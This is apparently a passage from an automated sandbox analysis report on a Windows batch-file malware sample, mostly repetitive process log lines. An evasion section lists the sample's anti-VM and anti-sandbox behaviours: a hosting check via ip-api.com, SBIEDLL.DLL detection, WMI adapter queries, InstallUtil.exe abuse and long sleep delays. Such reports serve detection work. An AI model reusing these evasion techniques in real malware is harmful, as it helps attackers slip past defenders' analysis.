                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Powershell is started from unusual location (likely to bypass HIPS)
                    Source: c:\users\user\appdata\roaming\mustflush.bat.dmfKey value queried: Powershell behaviorJump to behavior
                    Source: c:\users\user\desktop\ilzhnx3jac.bat.dmfKey value queried: Powershell behaviorJump to behavior
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory allocated: 40E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfMemory allocated: 40E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1370000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2C40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1370000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799967
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799419
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798853
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798531
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfWindow / User API: threadDelayed 3799Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfWindow / User API: threadDelayed 2213Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7247Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2592Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfWindow / User API: threadDelayed 3097Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfWindow / User API: threadDelayed 2005Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3747
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6081
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 664Thread sleep count: 3799 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 6640Thread sleep count: 2213 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 6668Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7256Thread sleep count: 7247 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7256Thread sleep count: 2592 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99874s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99762s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99433s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99320s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -99093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -98979s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -98872s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -98715s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -98604s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -98393s >= -30000sJump to behavior
